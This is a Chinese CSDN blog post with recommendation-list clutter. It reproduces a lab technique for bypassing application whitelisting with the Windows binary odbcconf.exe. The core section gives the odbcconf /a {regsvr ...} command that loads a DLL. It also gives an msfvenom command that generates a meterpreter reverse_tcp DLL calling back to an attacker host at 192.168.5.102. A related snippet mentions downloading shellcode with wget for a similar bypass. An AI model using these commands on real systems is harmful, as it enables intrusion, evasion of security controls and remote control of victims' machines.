对亮神基于白名单odbcconf.exe执行payload第十二季复现

最新推荐文章于 2024-03-06 09:17:36 发布

cxk331

最新推荐文章于 2024-03-06 09:17:36 发布

阅读量229

点赞数

分类专栏：亮神文章复现文章标签： msf 白名单

本文链接：https://blog.csdn.net/ws13129/article/details/89878667

版权

亮神文章复现专栏收录该内容

19 篇文章 3 订阅

订阅专栏

0x00 Odbcconf简介：

ODBCCONF.exe是一个命令行工具，允许配置ODBC驱动程序和数据源。

0x01 环境

攻击机 kali 192.168.5.102
靶机 win7 192.168.5.101
装有av

0x02复现

攻击机配置
在这里插入图片描述
靶机

odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}

弹回
在这里插入图片描述

0x03 hacker.dll

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.5.102 lport=4444 -f dll > hacker.dll

0x04 总结

不过360

0x05 借鉴

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/82_基于白名单Odbcconf执行payload第十二季.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cxk331

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
对亮神基于白名单odbcconf.exe执行payload第十二季复现

待补充…
复制链接

扫一扫

专栏目录

动态设置ODBC数据源（修改及新建）

侃

02-11

2661

对于网上有关内容进行整理，动态的本质在于手动控制ODBC数据源在注册表里的数值！可直接操作注册表也可通过DLL文件操作。ODBC在注册表中的存储位置：可用的驱动程序在 HKEY_LOCAL_MACHINE/SOFTWARE/ODBC/ODBCINST.INI 下,System DSN 在 HKEY_LOCAL_MACHINE/SOFTWARE/ODBC/ODBC.INI 下,Use

Windows上命令行实现运行时添加ODBC数据源-odbcconf命令的使用

seeallsea

06-29

1330

最近做的一个项目要求程序可以自动在windows上添加一个ODBC数据源，发现可以用Windows API中的SQLConfigDataSource函数可以实现，在查看MSDN文档时，这个函数等同于odbcconf.exe命令行工具。最好是使用SQLConfigDataSource自己实现一个application，用来创建ODBC数据源，但是使用odbcconf.exe命令行工具，然后...

参与评论您还未登录，请先登录后发表或查看评论

Win7系统提示找不到odbcconf.exe文件的解决办法

最新发布

file

03-06

780

其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题，如果是新手第一时间会认为是软件或游戏出错了，其实并不是这样，其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库，这时你可以下载这个odbcconf.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中，当我们执行某一个.exe程序时，相应的DLL文件就会被调用，因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现odbcconf.exe丢失要怎么解决？

打开DOS环境，输入SC命令或注册odbc时，系统提示sc或odbcconf.exe不是内部或外部命令

lytton_jing

04-24

3134

在xp、你、win7下试图添加一项新服务，打开DOS环境，输入SC命令或注册odbc时，系统提示sc或odbcconf.exe不是内部或外部命令。解决方法如下：右击我的电脑，点击属性》高级》环境变量，在弹出的新窗口下的系统变量中找到Path，点击编辑，在变量值一行中添加 %SystemRoot%/system32;%SystemRoot%;%SystemRoot%/System32/Wbem

Windows7系统odbcconf.exe文件丢失问题

amio555的专栏

12-19

837

ODBC Driver的信息没有了怎么办

querystringcom的专栏

08-19

661

我们只需要用odbcconf.exe来重新注册一下ODBC Driver就可以了。在Windows/System32目录下有几个脚本文件，可以来完成驱动程序的注册： odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\mdaccore.rsp odbcconf.exe /S /Lv

第八十二课：基于白名单Odbcconf执行payload第十二季.docx

09-15

在本课程中，我们探讨了如何利用白名单机制下的ODBCConf工具来执行Payload，特别是在互联网安全领域，这种技术常被APT（Advanced Persistent Threat）攻击者用来绕过防护措施。ODBCCONF.exe是一个用于配置ODBC驱动...

01-12

12-28

01-12

hl1293348082的专栏

03-28

1313

在内网渗透中，经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况，很多时候是由与安全软件做了白名单限制，只允许指定的白名单中的应用程序启动，这时我们就需要利用白名单中的程序做我们想做的事情，执行我们想要执行的程序，下面就给大家分享几个绕过白名单执行应用程序的姿势。一、通过 csharp 编译文件绕过防病毒软件 1、下载 CSharp 文件 wget http://tinyurl.com/InstallUtil-ShellCode-cs 2、使用 msfvenom 生成一个 msf

开放数据库互联ODBC配置（odbcconf）

weixin_30888413的博客

12-17

296

开放数据库互连（ODBC）是微软引进的一种早期数据库接口技术，通过ODBC驱动程序可访问数据库数据；使用ODBC管理器可以完成对数据库的链接操作。笔者利用ODBC接口，将WINDOWS计数器信息写入到SQL Server数据库中；以下是对ODBC配置：系统DNS：配置了这个数据源，当前服务器的所有用户都可以使用此数据源链接数据库。如下图所示： 1、添加驱动程序：SQL Server连接 ...

应用白名单：方法与挑战

weixin_41783960的博客

03-26

2167

应用白名单：方法与挑战这是关于白名单的第二篇文章，对白名单的一些方法和面临的问题进行了一些分析，也是属于概念范畴。文章地址：https://www.researchgate.net/publication/235981426_APPLICATION_WHITELISTING_APPROACHES_AND_CHALLENGES 摘要对于企业网络、家庭电脑而言，恶意软件是一个一直存在的问题。即使...

重新安装ODBC 驱动程序方法之一

飞鹰

12-16

4278

事实上，我们只需要用odbcconf.exe来重新注册一下ODBC Driver就可以了。在Windows/System32目录下有几个脚本文件，可以来完成驱动程序的注册： odbcconf.exe /S /Lv odbcconf.log /F %systemroot%\system32\mdaccore.rsp odbcconf.exe /S /Lv odbcconf.log /F %syst...

命令行加载mysql驱动_Windows上命令行实现运行时添加ODBC数据源-odbcconf命令的使用...

weixin_39952937的博客

02-07

280

lnux php 连接access,从linux上的php连接到MS Access远程.mdb文件

06-09

sudo odbcconf -a -s "accessdsn" -f /usr/local/easysoft/access/odbc-access/driver/etc/odbc.ini -c "DSN=accessdsn|DBQ=/path/to/your/access/database.mdb" ``` 其中 /path/to/your/access/database.mdb 是您要...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交